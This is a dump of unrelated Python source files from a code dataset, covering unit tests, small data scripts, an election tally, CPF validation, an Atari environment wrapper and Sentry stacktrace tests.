doc[\"s1\"].append(p)\n p.values[0].unit = \"km\"\n p.values[1].unit = \"mV\"\n res = validate(doc)\n self.assertError(res, \"the same unit\")\n\n del p.values[1]\n # missing dependency\n p.dependency = \"p2\"\n res = validate(doc)\n self.assertError(res, \"non-existant dependency object\")\n \n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"13331790","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (C) 2015 by Gaik Tamazian\n# gaik (dot) tamazian (at) gmail (dot) com\n\nimport glob\nimport os\nimport logging\nimport tempfile\nimport unittest\nfrom bioformats.gff3 import Gff3Record, Reader, Writer\nfrom bioformats.exception import Gff3Error\ntry:\n import itertools.izip as zip\nexcept ImportError:\n pass\n\npath = os.path.dirname(__file__)\nos.chdir(path)\n\n\nclass TestGff3Reader(unittest.TestCase):\n def setUp(self):\n self.__correct_file = os.path.join(\n 'data', 'gff3', 'correct.gff'\n )\n self.__incorrect_file_dir = os.path.join(\n 'data', 'gff3', 'incorrect_input'\n )\n self.__incorrect_files = glob.glob1(\n self.__incorrect_file_dir, '*.gff')\n # silence the logging messages\n logging.disable(logging.ERROR)\n\n def test_records(self):\n \"\"\"\n Check if the parse reads a file in the GFF3 format in the\n correct way.\n \"\"\"\n # test against the correct input file\n parser = Reader(self.__correct_file)\n for record in parser.records():\n self.assertIsInstance(record, Gff3Record)\n # test against incorrect input files\n for gff_file in self.__incorrect_files:\n parser = Reader(os.path.join(self.__incorrect_file_dir,\n gff_file))\n with self.assertRaises(Gff3Error):\n for _ in parser.records():\n pass\n\n\nclass TestGff3Writer(unittest.TestCase):\n def setUp(self):\n self.__input_file = os.path.join('data', 'gff3', 'correct.gff')\n self.__output_file = tempfile.NamedTemporaryFile().name\n\n def test_write(self):\n \"\"\"\n Check if GFF3 lines are written properly to the output file.\n \"\"\"\n test_input = Reader(self.__input_file)\n with Writer(self.__output_file) as test_output:\n for record in test_input.records():\n test_output.write(record)\n\n # compare the test output file to the original one\n with open(self.__input_file) as test_input:\n with open(self.__output_file) as test_output:\n for input_line, output_line in zip(test_input,\n test_output):\n self.assertEqual(input_line, output_line)\n","sub_path":"tests/test_gff3.py","file_name":"test_gff3.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"322706697","text":"import os\nimport csv\ncsvpath = os.path.join(\"election_data.csv\")\n\ndef FindWinner(names, percents):\n win=float(percents[0])\n winner = names[0]\n for count in percents:\n if float(count) > win:\n winner = names[count.index()]\n return winner\n\ncount = 0\nCandidates = []\nCandVote = []\nCandPercent = []\n\nwith open(csvpath,newline='')as csvfile:\n csvreader = csv.reader(csvfile,delimiter=',')\n header = next(csvreader, None)\n for row in csvreader:\n count +=1\n if row[2] not in Candidates:\n Candidates.append(row[2])\n CandVote.append(1)\n else:\n votefor = Candidates.index(row[2])\n CandVote[votefor] += 1\n for votes in CandVote:\n Percent = float(votes/count*100)\n CandPercent.append(Percent)\n winner = FindWinner(Candidates,CandVote)\n\n\nprint(\"Election Results\")\nprint(\"----------------\")\nprint(f\"Total Votes:{count} \")\nprint(\"------------------\")\nfor i in range(len(Candidates)):\n print(f\"{Candidates[i]}: {round(CandPercent[i],2)}% ({CandVote[i]} votes)\")\nprint(\"-------------------\")\nprint(f\"{winner} is the winner.\")\n\n\nf = open(\"Election.txt\", \"w+\")\nf.write(\"Election Results\" \"\\n\")\nf.write(\"----------------\" \"\\n\")\nf.write(f\"Total Votes:{count}\" \"\\n\")\nf.write(\"------------------\" \"\\n\")\nfor i in range(len(Candidates)):\n f.write(f\"{Candidates[i]}: {round(CandPercent[i],2)}% ({CandVote[i]} votes)\" \"\\n\")\nf.write(\"-------------------\" \"\\n\")\nf.write(f\"{winner} is the winner.\" \"\\n\")\nf.close\n","sub_path":"python-challenge/PyPol/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"222991074","text":"#!/usr/bin/env python3\nimport random\n\n# This file is a quick and dirty search + replace for credit card numbers.\n\nwith open('Store1.sql', 'w') as new_file:\n with open('Store.sql', 'r') as old_file:\n for line in old_file:\n new_string = str(random.randint(1247284246323124, 9999999999999999))\n new_file.write(line.replace(\"XYZ\", new_string))\n","sub_path":"SQL/replace.py","file_name":"replace.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"5023993","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 9 14:34:42 2021\n\n@author: irvine\n\"\"\"\n\nfrom random import *\n\nverbs = [\"sitz\",\"schreibt\",\"platziert\",\"unterstützt\"]\nverbp = [\"stehen\",\"gehen\"]\no1 = [\"der Manager\",\"ein Key-Account-Manager\",\"die Innovation\",\"die klügsten Köpfe\"]\no3 = [\"dem Mitarbeiter\",\"den Kunden\",\"dem Wissen\",\"einem Probeunternehmen\"]\no4 = [\"die Zielvorgabe\",\"der Struktur\",\"den Leuten\",\"ein allgemein gültiges Leistungsmodell\"]\nerg = [\"im Rahmen der Dissertationsarbeit\",\"gerade im Top-Management\",\"zum Beispiel\",\"dieses Jahr\",\"heute\",\"morgen\"]\nhs = [\"ja,\",\"das ist definitiv so,\"]\n\ntext = \"\"\nsp = \" \"\n\nNsatz = 1000\n\nfor n in range(Nsatz):\n b = randint(1,8)\n if b%3 == 0:\n satz = o1[randint(0,len(o1)-1)] + sp + verbs[randint(0,len(verbs)-1)] + sp + o3[randint(0,len(o3)-1)]\n if b%3 == 1:\n satz = o1[randint(0,len(o1)-1)] + sp + verbs[randint(0,len(verbs)-1)] + sp + o4[randint(0,len(o1)-1)] \n if b%3 == 2:\n satz = erg[randint(0,len(erg)-1)] + sp + verbp[randint(0,len(verbp)-1)] + sp + o1[randint(0,len(o1)-1)] + sp + o3[randint(0,len(o1)-1)]\n if b == 1:\n satz = hs[randint(0,len(hs)-1)] + sp + satz\n satz = satz[0].upper() + satz[1:] + \".\"\n text = text + satz + sp\n if randint(0,20) == 0:\n text = text + \"\\n\\n\"\n \nprint (text)","sub_path":"aschbacher.py","file_name":"aschbacher.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"575534089","text":"import argparse\nimport os\n\n\ndef main():\n day = os.path.basename(__file__).split('-')[0]\n challenge_input = '{}-input.txt'.format(day)\n # challenge_input = '{}-example.txt'.format(day)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--input', default=challenge_input)\n args = parser.parse_args()\n\n lines = []\n with open(args.input, 'r') as infile:\n for line in infile:\n lines.append(line.strip())\n\n ferry = Ferry()\n for instruction in lines:\n ferry.act(Instruction(instruction))\n\n m_dist = abs(ferry.pos.x) + abs(ferry.pos.y)\n print('Ending coords:', ferry.pos)\n print('Manhattan distance:', m_dist)\n\n\nclass Pos:\n def __init__(self, x: int, y: int):\n self.x = x\n self.y = y\n self._hash = y * 100 + x\n\n def __eq__(self, other):\n return self.x == other.x and self.y == other.y\n\n def __repr__(self):\n return '({},{})'.format(self.x, self.y)\n\n def __hash__(self):\n return self._hash\n\n\nclass Instruction:\n def __init__(self, instruction: str):\n self.action = instruction[0]\n self.value = int(instruction[1:])\n\n\nclass Ferry:\n def __init__(self):\n self.pos = Pos(0, 0)\n self.waypoint = Pos(10, 1)\n\n def act(self, instruction: Instruction):\n action: str = instruction.action\n value: int = instruction.value\n\n compass = 'NESW'\n vectors = {\n 'N': Pos(0, 1),\n 'E': Pos(1, 0),\n 'S': Pos(0, -1),\n 'W': Pos(-1, 0),\n }\n\n if action in compass:\n self.waypoint.x += vectors[action].x * value\n self.waypoint.y += vectors[action].y * value\n elif action == 'F':\n self.pos.x += self.waypoint.x * value\n self.pos.y += self.waypoint.y * value\n elif action in 'LR':\n if action == 'L':\n value = 360 - value\n x = self.waypoint.x\n y = self.waypoint.y\n if value == 90:\n self.waypoint = Pos(y, -x)\n elif value == 180:\n self.waypoint = Pos(-x, -y)\n elif value == 270:\n self.waypoint = Pos(-y, x)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"2020/12-2.py","file_name":"12-2.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"526783766","text":"import logging\n\n\nclass PretrainedEmbedderLoader:\n\n @property\n def logger(self):\n return logging.getLogger(__name__)\n\n def __call__(self, handle, other_words_embed_dict, ignore_word_filter=None):\n \"\"\"\nExpects the stream of strings to contain word embedding. Each record must be in space separated format with the first column containing the word itself.\nEach record is separated by new lines\ne.g for an embedding of size 10\nzsombor -0.75898 -0.47426 0.4737 0.7725 -0.78064 0.23233 0.046114 0.84014 0.243710 .022978\nsandberger 0.072617 -0.51393 0.4728 -0.52202 -0.35534 0.34629 0.23211 0.23096 0.26694 .41028\n :param other_words_embed_dict: Additional words word embedding, for words not in the handle\n :param ignore_word_filter: Use a filter function to ignore words, return true to ignore a word\n :return: a tuple (word_index_dict, embeddings_array)\n :param handle: handle containing the embedding\n \"\"\"\n word_index_dict = {}\n embeddings_array = []\n other_words_embed_dict = other_words_embed_dict or {}\n\n # Load embeddings from file\n for line in handle:\n values = line.split()\n word = values[0]\n\n # if word needs to be filtered, ignore word\n if ignore_word_filter is not None and ignore_word_filter(word): continue\n\n # Not ignored word\n embeddings = [float(v) for v in values[1:]]\n word_index_dict[word] = len(word_index_dict)\n embeddings_array.append(embeddings)\n\n # Add embeddings for additional words that do not exist in handle\n words_not_in_embedding = set()\n\n for w in other_words_embed_dict.keys():\n # if word needs to be filtered, ignore word\n if ignore_word_filter is not None and ignore_word_filter(w): continue\n\n # Not ignored word\n if word_index_dict.get(w, None) is None:\n word_index_dict[w] = len(word_index_dict)\n embeddings_array.append(other_words_embed_dict[w])\n words_not_in_embedding.add(w)\n\n self.logger.info(\"The number of words intialised without embbeder is {}\".format(len(words_not_in_embedding)))\n self.logger.debug(\"The words intialised without embbeder is \\n {}\".format(words_not_in_embedding))\n\n # Convert to ndarray or cupy\n return word_index_dict, embeddings_array\n","sub_path":"source/algorithms/PretrainedEmbedderLoader.py","file_name":"PretrainedEmbedderLoader.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"202209778","text":"from rest_framework.response import Response\nfrom rest_framework import status\nfrom accounts.models import User\nimport re\n\ndef ValidarCPF(valor):\n\n\t# if User.objects.filter(username=valor).exists():\n\t# \tprint(\"primeiro if\")\n\t# \treturn False\n\n\tvalor = valor.replace('.', '')\n\tvalor = valor.replace('-', '')\n\n\tif not valor.isdigit() or len(valor) != 11:\n\t\tprint(\"segundo if\")\n\t\treturn False\n\n\tcpf_valido = valor[0:9]\n\tbase = 10\n \n\twhile len(cpf_valido) < 11:\n \n\t\tsoma = 0\n\t \n\t\tfor n in cpf_valido:\n\t\t\tsoma += int(n) * base\n\t\t\tbase -= 1\n\t \n\t\tdigito = soma % 11\n\t \n\t\tif digito < 2:\n\t\t\tdigito = 0\n\t\telse:\n\t\t\tdigito = 11 - digito\n\t\t \n\t\tcpf_valido += str(digito)\n\n\t\tbase = 11\n\n\tif cpf_valido == valor:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef ValidarClassificacaoEscola(data):\n\tdata = data.lower()\n\tif data == \"municipal\" or data == \"estadual\":\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef ValidarTipoEscola(data):\n\tdata = data.lower()\n\tif str(data) not in \"escola/creche/pré-escola\":\n\t\treturn False\n\telse:\n\t\treturn True\n\ndef ValidarSenha(data):\n\tif len(data) < 6:\n\t\treturn False\n\telif not re.search(\"[a-z]\", data) and not re.search(\"[A-Z]\", data):\n\t\treturn False\n\telif not any(i.isdigit() for i in data):\n\t\treturn False\n\telse:\n\t\treturn True","sub_path":"Prestcon API/school/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"40271848","text":"import asyncio\nimport websockets\nimport uuid\n\nmac_id = ':'.join(['{:02x}'.format((uuid.getnode() >> ele) & 0xff) \nfor ele in range(0,8*6,8)][::-1])\n\n\nasync def hello(websocket, path):\n name = await websocket.recv()\n print(f\"< {name}\")\n await websocket.send(mac_id)\n print(f\"> {mac_id}\")\n\nstart_server = websockets.serve(hello, 'localhost', 8765)\n\nasyncio.get_event_loop().run_until_complete(start_server)\nasyncio.get_event_loop().run_forever()","sub_path":"wtsap_socket.py","file_name":"wtsap_socket.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"514459281","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom matplotlib import pyplot as plt\r\nfrom random import random\r\n\r\nx1 = list(range(1,11))\r\ny1 = list(map(lambda x : x * random() + 3, x1))\r\n\r\nx2 = list(range(1,11))\r\ny2 = list(map(lambda x : x * random() + 10, x2))\r\n\r\nplt.title(\"Plot Example\")\r\nplt.xlabel(\"Data 1 ~ 10\")\r\nplt.ylabel(\"Random Data\")\r\n\r\n# 다수개의 그래프를 생성하는 경우\r\n# 서브플롯 설정 방법\r\n# subplot 함수를 사용\r\n# subplot(행,열,위치)\r\n# subplot(행열위치) -> , 없이 사용할 수 있음\r\nplt.subplot(211)\r\nplt.title(\"Plot Example\")\r\nplt.xlabel(\"Data 1 ~ 10\")\r\nplt.ylabel(\"Random Data\")\r\nplt.plot(x1,y1,\"--r\",label=\"First\")\r\nplt.legend(loc=\"upper left\")\r\n\r\nplt.subplot(212)\r\nplt.title(\"Plot Example\")\r\nplt.xlabel(\"Data 1 ~ 10\")\r\nplt.ylabel(\"Random Data\")\r\nplt.plot(x2,y2,\"-.y\",label=\"Second\")\r\nplt.legend(loc=\"upper left\")\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"day_07/matplotlib_09.py","file_name":"matplotlib_09.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"319341142","text":"import os\n\nimport dvc\nimport pytest\nfrom mock import mock_open, patch\n\nfrom dvc.ignore import DvcIgnorePatterns, DvcIgnoreDirs\n\n\ndef mock_dvcignore(dvcignore_path, patterns):\n\n with patch.object(\n dvc.ignore, \"open\", mock_open(read_data=\"\\n\".join(patterns))\n ):\n ignore_patterns = DvcIgnorePatterns(dvcignore_path)\n\n return ignore_patterns\n\n\ndef test_ignore_from_file_should_filter_dirs_and_files():\n dvcignore_path = os.path.join(\n os.path.sep, \"full\", \"path\", \"to\", \"ignore\", \"file\", \".dvcignore\"\n )\n\n patterns = [\"dir_to_ignore\", \"file_to_ignore\"]\n\n root = os.path.dirname(dvcignore_path)\n dirs = [\"dir1\", \"dir2\", \"dir_to_ignore\"]\n files = [\"file1\", \"file2\", \"file_to_ignore\"]\n\n ignore = mock_dvcignore(dvcignore_path, patterns)\n new_dirs, new_files = ignore(root, dirs, files)\n\n assert {\"dir1\", \"dir2\"} == set(new_dirs)\n assert {\"file1\", \"file2\"} == set(new_files)\n\n\n@pytest.mark.parametrize(\n \"file_to_ignore_relpath, patterns, expected_match\",\n [\n (\"to_ignore\", [\"to_ignore\"], True),\n (\"to_ignore.txt\", [\"to_ignore*\"], True),\n (\n os.path.join(\"rel\", \"p\", \"p2\", \"to_ignore\"),\n [\"rel/**/to_ignore\"],\n True,\n ),\n (\n os.path.join(\n os.path.sep,\n \"full\",\n \"path\",\n \"to\",\n \"ignore\",\n \"file\",\n \"to_ignore\",\n ),\n [\"to_ignore\"],\n True,\n ),\n (\"to_ignore.txt\", [\"/*.txt\"], True),\n (\n os.path.join(\"rel\", \"path\", \"path2\", \"to_ignore\"),\n [\"rel/*/to_ignore\"],\n False,\n ),\n (os.path.join(\"path\", \"to_ignore.txt\"), [\"/*.txt\"], False),\n (\n os.path.join(\"rel\", \"path\", \"path2\", \"dont_ignore\"),\n [\"rel/**/to_ignore\"],\n False,\n ),\n (\"dont_ignore.txt\", [\"dont_ignore\"], False),\n (\"dont_ignore.txt\", [\"dont*\", \"!dont_ignore.txt\"], False),\n (\"../../../something.txt\", [\"**/something.txt\"], False),\n ],\n)\ndef test_match_ignore_from_file(\n file_to_ignore_relpath, patterns, expected_match\n):\n\n dvcignore_path = os.path.join(\n os.path.sep, \"full\", \"path\", \"to\", \"ignore\", \"file\", \".dvcignore\"\n )\n dvcignore_dirname = os.path.dirname(dvcignore_path)\n\n ignore_file = mock_dvcignore(dvcignore_path, patterns)\n\n assert (\n ignore_file.matches(dvcignore_dirname, file_to_ignore_relpath)\n == expected_match\n )\n\n\n@pytest.mark.parametrize(\"omit_dir\", [\".git\", \".hg\", \".dvc\"])\ndef test_should_ignore_dir(omit_dir):\n ignore = DvcIgnoreDirs([\".git\", \".hg\", \".dvc\"])\n\n root = os.path.join(os.path.sep, \"walk\", \"dir\", \"root\")\n dirs = [omit_dir, \"dir1\", \"dir2\"]\n files = []\n\n new_dirs, _ = ignore(root, dirs, files)\n\n assert set(new_dirs) == {\"dir1\", \"dir2\"}\n","sub_path":"tests/unit/test_ignore.py","file_name":"test_ignore.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"260982334","text":"speech = \"I am happy to join with you today in what will go down in history as the greatest demonstration for freedom in the history of our nation.\"\nd = speech.split()\nword = {}\nalpha={}\nfor i in d:\n key = i.lower()\n if key in word:\n word[key]+=1\n elif key not in word:\n word[key]=1\n for j in range(len(key)):\n if key[j] in alpha:\n alpha[key[j]]+=1\n elif key[j] not in alpha:\n alpha[key[j]]=1\n\n\n\ndef count(item):\n return item[1]\n\n\n\nfor i in sorted(word.items(),key=count):\n print(i)\nfor j in sorted(alpha.items(),key=count):\n print(j)\n","sub_path":"general/WordFreq.py","file_name":"WordFreq.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"265539321","text":"import numpy as np\nfrom sklearn.model_selection import KFold\nimport pandas as pd\nimport random\n\n'''测试数据'''\nrandom.seed(32)\n# df = pd.read_csv('../dataset/train.csv').values\n# rd = random.sample(range(len(df)),len(df))\n# df = df[rd]\n# df = pd.DataFrame({'id':df[:,0],'label':df[:,1]})\n# df.to_csv('../dataset/train_corss_validation',index=False)\n\n\ndf = pd.read_csv('../dataset/train_corss_validation').values\nid,labels = df[:,0],df[:,1]\ndata_size = len(id)\ndef get_kfole(k=5):\n kf = KFold(k)\n fold_num = 0\n for train_index,test_index in kf.split(id):\n train_id,test_id = id[train_index],id[test_index]\n train_label,test_label = labels[train_index],labels[test_index]\n pd.DataFrame({'id':train_id,'label':train_label}).to_csv('../dataset/five_fold/train_kfold_{}.csv'.format(fold_num),index=False)\n pd.DataFrame({'id':test_id,'label':test_label}).to_csv('../dataset/five_fold/test_kfold_{}.csv'.format(fold_num),index=False)\n fold_num += 1\n\nif __name__ == '__main__':\n get_kfole()\n\n\n","sub_path":"scripts/cross_validation.py","file_name":"cross_validation.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"649313303","text":"import numpy as np\nimport tensorflow as tf\n\nfrom algorithms.utils.arguments import default_cfg\nfrom envs.create_env import create_env\n\nATARI_W = ATARI_H = 84\nATARI_DIM = 4\n\nATARI_ACTION_SET = (\n 0,\n 1,\n 2,\n 3,\n)\n\nclass PyProcessAtari:\n \"\"\"Atari wrapper for PyProcess.\"\"\"\n\n def __init__(self, level, config, num_action_repeats, seed, runfiles_path=None, level_cache=None):\n self._observation_spec = ['RGB_INTERLEAVED']\n env_name = 'atari_breakout'\n cfg = default_cfg(env=env_name, algo=None)\n cfg.pixel_format = 'HWC'\n cfg.res_w = ATARI_W\n cfg.res_h = ATARI_H\n self._env = create_env(env_name, cfg=cfg)\n\n def _reset(self):\n self._env.reset()\n\n # def _observation(self, obs):\n # # return [obs, '']\n # return obs\n\n def initial(self):\n obs = self._env.reset()\n return obs\n # return self._observation(obs)\n\n def step(self, action):\n obs, rew, done, info = self._env.step(action)\n done = np.array(done)\n if done:\n obs = self._env.reset()\n # observation = self._observation(obs)\n reward = np.array(rew, dtype=np.float32)\n return reward, done, obs\n\n def close(self):\n self._env.close()\n\n @staticmethod\n def _tensor_specs(method_name, unused_kwargs, constructor_kwargs):\n \"\"\"Returns a nest of `TensorSpec` with the method's output specification.\"\"\"\n\n observation_spec = [\n tf.contrib.framework.TensorSpec([ATARI_H, ATARI_W, ATARI_DIM], tf.uint8),\n # tf.contrib.framework.TensorSpec([], tf.string),\n ]\n\n if method_name == 'initial':\n return observation_spec\n elif method_name == 'step':\n return (\n tf.contrib.framework.TensorSpec([], tf.float32),\n tf.contrib.framework.TensorSpec([], tf.bool),\n observation_spec,\n )\n","sub_path":"environments_atari.py","file_name":"environments_atari.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"483440410","text":"import ast\n\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\n\ncred = credentials.Certificate(\"./giobot-telegram-firebase.json\")\nfirebase_admin = firebase_admin.initialize_app(\n cred, {\"databaseURL\": \"https://giobot-telegram.firebaseio.com/\"}\n)\nref = db.reference(\"ranking\")\n\n\ndef write_db(git, repos):\n ref.child(git).set({\"git\": git, \"repos\": repos})\n\n\nwrite_db(\"devgiordane\", 15)\n\n\n# def read_db():\n# with open(\"ranking/db.txt\", \"r\", encoding=\"utf-8\") as db:\n# ranking = ast.literal_eval(db.read())\n# return ranking\n\n\ndef gen_ranking():\n ranking = ref.get()\n lista = sorted(ranking.values(), key=lambda x: x[\"repos\"], reverse=True)\n msg = \"\"\n for i, user in enumerate(lista):\n if i < 10:\n msg += f'{i+1}º {user[\"git\"]} com {user[\"repos\"]} repos \\n'\n return msg\n","sub_path":"ranking/ranking.py","file_name":"ranking.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"218521343","text":"from django.conf import settings\nfrom django.db import models\nfrom django.db.models import F\nfrom django.urls import reverse\n\n\nclass Blog(models.Model):\n author = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE,\n verbose_name='Автор',\n )\n\n created_at = models.DateTimeField(\n auto_now_add=True,\n verbose_name='Дата и время создания',\n )\n name = models.CharField(\n max_length=500,\n verbose_name='Наименование',\n )\n image = models.ImageField(\n upload_to='%Y/%m/%d/',\n blank=True,\n null=True,\n verbose_name='Изображение',\n )\n text = models.TextField(\n verbose_name='Текст',\n )\n views = models.PositiveIntegerField(\n default=0,\n verbose_name='Количество просмотров',\n )\n\n class Meta:\n ordering = ['-created_at']\n\n def __str__(self) -> str:\n return str(self.name)\n\n def get_absolute_url(self):\n return reverse('blogs:blog-detail', kwargs={'pk': self.pk})\n\n def get_update_url(self):\n return reverse('blogs:blog-update', kwargs={'pk': self.pk})\n\n def get_delete_url(self):\n return reverse('blogs:blog-delete', kwargs={'pk': self.pk})\n\n def increment_views(self):\n self.views = F('views') + 1\n self.save()\n","sub_path":"zhmach/apps/blogs/models/blog.py","file_name":"blog.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"87963404","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\n\nimport functools\n\nimport mock\nfrom django.conf import settings\nfrom django.template.loader import render_to_string\nfrom exam import fixture\n\nfrom sentry.interfaces.stacktrace import (\n Frame, Stacktrace, get_context, is_url, slim_frame_data,\n trim_function_name\n)\nfrom sentry.models import Event\nfrom sentry.testutils import TestCase\n\n\ndef test_is_url():\n assert is_url('http://example.org/') is True\n assert is_url('https://example.org/') is True\n assert is_url('file:///tmp/filename') is True\n assert is_url('applewebdata://00000000-0000-1000-8080-808080808080') is True\n assert is_url('app:///index.bundle') is False # react native\n assert is_url('webpack:///./app/index.jsx') is False # webpack bundle\n assert is_url('data:,') is False\n assert is_url('blob:\\x00') is False\n\n\ndef test_trim_function_name():\n assert trim_function_name('+[foo:(bar)]', 'objc') == '+[foo:(bar)]'\n assert trim_function_name('[foo:(bar)]', 'objc') == '[foo:(bar)]'\n assert trim_function_name('-[foo:(bar)]', 'objc') == '-[foo:(bar)]'\n assert trim_function_name(\n '(anonymous namespace)::foo(int)',\n 'native') == '(anonymous namespace)::foo'\n assert trim_function_name('foo::bar::foo(int)', 'native') == 'foo::bar::foo'\n\n\nclass GetContextTest(TestCase):\n def test_works_with_empty_filename(self):\n result = get_context(0, 'hello world')\n assert result == [(0, 'hello world')]\n\n\nclass StacktraceTest(TestCase):\n @fixture\n def interface(self):\n return Stacktrace.to_python(\n dict(\n frames=[\n {\n 'filename': 'foo/bar.py'\n }, {\n 'filename': 'foo/baz.py',\n 'lineno': 1,\n 'in_app': True,\n }\n ]\n )\n )\n\n def test_null_values(self):\n sink = {}\n\n assert Stacktrace.to_python({}).to_json() == sink\n assert Stacktrace.to_python({'frames': None}).to_json() == sink\n assert Stacktrace.to_python({'frames': []}).to_json() == sink\n\n # TODO(markus): Should eventually generate frames: [None]\n assert Stacktrace.to_python({'frames': [None]}).to_json() == {}\n\n def test_null_values_in_frames(self):\n sink = {'frames': [{}]}\n\n assert Stacktrace.to_python({'frames': [{}]}).to_json() == sink\n assert Stacktrace.to_python({'frames': [{'abs_path': None}]}).to_json() == sink\n\n def test_legacy_interface(self):\n # Simple test to ensure legacy data works correctly with the ``Frame``\n # objects\n event = self.event\n interface = Stacktrace.to_python(event.data['stacktrace'])\n assert len(interface.frames) == 2\n assert interface == event.interfaces['stacktrace']\n\n def test_filename(self):\n Stacktrace.to_python(dict(frames=[{\n 'filename': 'foo.py',\n }]))\n Stacktrace.to_python(dict(frames=[{\n 'lineno': 1,\n 'filename': 'foo.py',\n }]))\n\n def test_allows_abs_path_without_filename(self):\n interface = Stacktrace.to_python(\n dict(frames=[{\n 'lineno': 1,\n 'abs_path': 'foo/bar/baz.py',\n }])\n )\n frame = interface.frames[0]\n assert frame.filename == 'foo/bar/baz.py'\n assert frame.abs_path == frame.filename\n\n def test_coerces_url_filenames(self):\n interface = Stacktrace.to_python(\n dict(frames=[{\n 'lineno': 1,\n 'filename': 'http://foo.com/foo.js',\n }])\n )\n frame = interface.frames[0]\n assert frame.filename == '/foo.js'\n assert frame.abs_path == 'http://foo.com/foo.js'\n\n def test_does_not_overwrite_filename(self):\n interface = Stacktrace.to_python(\n dict(\n frames=[{\n 'lineno': 1,\n 'filename': 'foo.js',\n 'abs_path': 'http://foo.com/foo.js',\n }]\n )\n )\n frame = interface.frames[0]\n assert frame.filename == 'foo.js'\n assert frame.abs_path == 'http://foo.com/foo.js'\n\n def test_ignores_results_with_empty_path(self):\n interface = Stacktrace.to_python(\n dict(frames=[{\n 'lineno': 1,\n 'filename': 'http://foo.com',\n }])\n )\n frame = interface.frames[0]\n assert frame.filename == 'http://foo.com'\n assert frame.abs_path == frame.filename\n\n def test_serialize_returns_frames(self):\n interface = Stacktrace.to_python(dict(frames=[{\n 'lineno': 1,\n 'filename': 'foo.py',\n }]))\n result = interface.to_json()\n assert 'frames' in result\n\n def test_frame_hard_limit(self):\n hard_limit = settings.SENTRY_STACKTRACE_FRAMES_HARD_LIMIT\n interface = Stacktrace.to_python(\n {\n 'frames': [\n {\n 'filename': 'Application.java',\n 'function': 'main',\n 'lineno': i, # linenos from 1 to the hard limit + 1\n } for i in range(1, hard_limit + 2)\n ]\n }\n )\n\n assert len(interface.frames) == hard_limit\n assert interface.frames[0].lineno == 1\n assert interface.frames[-1].lineno == hard_limit + 1\n # second to last frame (lineno:250) should be removed\n assert interface.frames[-2].lineno == hard_limit - 1\n\n @mock.patch('sentry.interfaces.stacktrace.Stacktrace.get_stacktrace')\n def test_to_string_returns_stacktrace(self, get_stacktrace):\n event = mock.Mock(spec=Event())\n interface = Stacktrace(frames=[])\n result = interface.to_string(event)\n get_stacktrace.assert_called_once_with(event, system_frames=False, max_frames=10)\n self.assertEquals(result, get_stacktrace.return_value)\n\n @mock.patch('sentry.interfaces.stacktrace.is_newest_frame_first', mock.Mock(return_value=False))\n def test_get_stacktrace_with_only_filename(self):\n event = mock.Mock(spec=Event())\n interface = Stacktrace.to_python(dict(frames=[{'filename': 'foo'}, {'filename': 'bar'}]))\n result = interface.get_stacktrace(event)\n self.assertEquals(\n result, 'Stacktrace (most recent call last):\\n\\n File \"foo\"\\n File \"bar\"'\n )\n\n @mock.patch('sentry.interfaces.stacktrace.is_newest_frame_first', mock.Mock(return_value=False))\n def test_get_stacktrace_with_module(self):\n event = mock.Mock(spec=Event())\n interface = Stacktrace.to_python(dict(frames=[{'module': 'foo'}, {'module': 'bar'}]))\n result = interface.get_stacktrace(event)\n self.assertEquals(\n result, 'Stacktrace (most recent call last):\\n\\n Module \"foo\"\\n Module \"bar\"'\n )\n\n 